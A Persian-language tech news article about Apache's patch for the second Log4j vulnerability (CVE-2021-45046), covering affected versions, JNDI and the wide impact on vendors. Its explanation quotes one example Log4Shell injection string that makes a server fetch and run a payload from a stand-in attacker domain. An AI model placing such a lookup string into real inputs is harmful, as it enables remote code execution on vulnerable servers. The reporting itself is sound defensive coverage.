آرامش قبل از طوفان؛ کشف دومین آسیب پذیری Log4j با ابعاد تاثیرگذاری بسیار گسترده

اخبار داغ فناوری اطلاعات و امنیت شبکه

 takian.ir second log4j vulnerability discovered 1

سازمان نرم‌افزار آپاچی (ASF) پس از اینکه پچ قبلی که برای بهره‌برداری Log4Shell که اخیراً فاش شده بود به علت «ناقص بودن پیکربندی‌های غیر پیش‌فرض بخصوص» منتشر شده بود، اصلاحیه جدیدی را برای ابزار لاگینگ Log4j ارائه کرده است.

دومین آسیب‌پذیری که با نام CVE-2021-45046 مطرح می‌شود، در سیستم رتبه‌بندی CVSS دارای امتیاز 3.7 از حداکثر 10 است و همه نسخه‌های Log4j از 2.0-beta9 تا 2.12.1 و 2.13.0 تا 2.15.0 را تحت تأثیر قرار می‌دهد. مدیران پروژه هفته گذشته برای رسیدگی به یک آسیب پذیری اجرای کد از راه دور مهم (CVE-2021-44228) اقدام کردند که ممکن است برای نفوذ و کنترل سیستم ها مورد سواستفاده قرار گیرد.

سازمان نرم‌افزاری آپاچی در توصیه‌ای جدید گفت، پچ ناقص برای CVE-2021-44228، می‌تواند برای «تولید داده‌های ورودی مخرب با استفاده از الگوی جستجوی JNDI که منجر به حمله denial-of-service (DoS) می‌شود، مورد سواستفاده قرار گیرد. آخرین نسخه Log4j، 2.16.0 (برای کاربرانی که به جاوا 8 یا جدیدتر نیاز دارند)، همه پشتیبانی از جستجوی پیام را حذف می‌کند و JNDI را (مؤلفه‌ای که در مرکز این آسیب‌پذیری قرار دارد) به طور پیش‌فرض غیرفعال می‌کند. به کاربرانی که به جاوا 7 نیاز دارند اکیدا توصیه می شود پس از در دسترس قرار گرفتن Log4j نسخه 2.12.2 را، ارتقا دهند.

رالف گورز از ASF توضیح داد: "برخورد با CVE-2021-44228 نشان داد که JNDI دارای مشکلات امنیتی مهمی است. در حالی که ما تلاش میکنیم تا آن مشکلاتی را که می‌دانیم کاهش دهیم، اما غیرفعال کردن کامل آن به طور پیش‌فرض برای کاربران ایمن‌تر خواهد بود، به خصوص که بعید است جامعه آماری اکثریتی از آن استفاده کنند".

اساسا JNDI، مخفف Java Naming and Directory Interface، یک API جاوا است که به برنامه‌های کدگذاری شده در زبان برنامه‌نویسی امکان می‌دهد داده‌ها و ریسورس هایی مانند سرورهای LDAP را جستجو کنند. Log4Shell در لایبرری Log4j مستقر است که یک فریمورک لاگینگ متن باز و مبتنی بر جاوا میباشد که معمولا در وب سرورهای آپاچی (Apache) گنجانده شده است.

این مشکل زمانی رخ می‌دهد که از مؤلفه JNDI کانکتور LDAP برای تزریق یک درخواست مخرب LDAP (چیزی شبیه به "${jndi:ldap://attacker_controled_website/payload_to_be_executed}")، که زمانیکه روی سرور وب که نسخه آسیب‌پذیر لایببرز را اجرا می‌کند وارد شوید، استفاده میشود و دشمن را قادر می‌سازد تا یک payload را از یک دامین راه دور بازیابی کرده و آن را به صورت لوکال اجرا کند.

آخرین بروزرسانی در حالی ارائه می‌شود که عواقب این نقص منجر به یک «همه‌گیری و پاندمی سایبری واقعی» شده است؛ چیزی که چندین عامل تهدید Log4Shell را به روش‌هایی که زمینه را برای حملات بیشتر، از جمله استقرار استخراج‌کننده‌های رمزارز، تروجان‌های دسترسی از راه دور و باج‌افزار در تجهیزات که در موارد حساس ایجاد می‌کند، فراهم کرده است. اگرچه این اشکال در 9 دسامبر به طور عمومی شناخته شد، اما گفته می‌شود که این نفوذهای فرصت‌طلبانه حداقل از اول دسامبر آغاز شده‌اند.

این نقص امنیتی زنگ خطر بزرگی را به صدا درآورده است زیرا در یک لاگینگ فریمورک که تقریبا همه جا مورد استفاده است، در برنامه‌های جاوا وجود دارد و عاملان تهدادت سایبری را با دروازه‌ای بی‌‌بدیل برای نفوذ و به خطر انداختن میلیون‌ها دستگاه در سراسر جهان مواجه می‌کند.

این نقص قابل بهره‌برداری از راه دور بر روی صدها محصول بزرگ سازمانی شامل تعدادی از شرکت‌ها مانند Akamai، Amazon، Apache، Apereo، Atlassian، Broadcom، Cisco، Cloudera، Google، ConnectWise، Apereo و IBM، Intel، Juniper Networks، Microsoft، Okta، Oracle، Red Hat، SolarWinds، SonicWall، Splunk، Ubuntu، VMware، Zscaler و Zoho که ریسک زنجیره تامین نرم‌افزار قابل توجهی را به همراه دارند را تحت تاثیر قرار میدهد.

شرکت امنیتی چک پوینت در این باره گفت: «برخلاف سایر حملات سایبری بزرگ که شامل یک یا تعداد محدودی نرم‌افزار است، Log4j اساساً در هر محصول یا سرویس وب مبتنی بر جاوا تعبیه شده و اصلاح منوال آن بسیار دشوار است. این آسیب‌پذیری، به دلیل پیچیدگی در پچ آن و سهولت بهره‌برداری، به نظر می‌رسد که تا سال‌های آینده با ما باقی مانده و همراه خواهد بود، مگر اینکه شرکت‌ها و سرویس دهنده‌ها سریعا با اجرای اقدامات حفاظتی، در راستای جلوگیری از حملات به محصولات خود اقدام کنند».

برچسب ها: Logging, Zoho, Splunk, Okta, Broadcom, Cloudera, ConnectWise, Apereo, Atlassian, Java Naming and Directory Interface, JNDI, Exploit, Cryptominer, Apache Log4j, Log4j, Log4Shell, Zscaler, ماینر, IBM, Miner, پچ, Amazon, API, Shell, apache, Cisco, Juniper Networks, Ubuntu, Red Hat, DoS, Sonicwall, Oracle, Intel, Patch, cybersecurity, Microsoft, SolarWinds, رمزارز, VMware, Akamai, اکسپلویت‌, آسیب‌پذیری, malware, cryptocurrency, بدافزار, امنیت سایبری, Cyber Attacks, حمله سایبری

نوشته شده توسط تیم خبر.

چاپ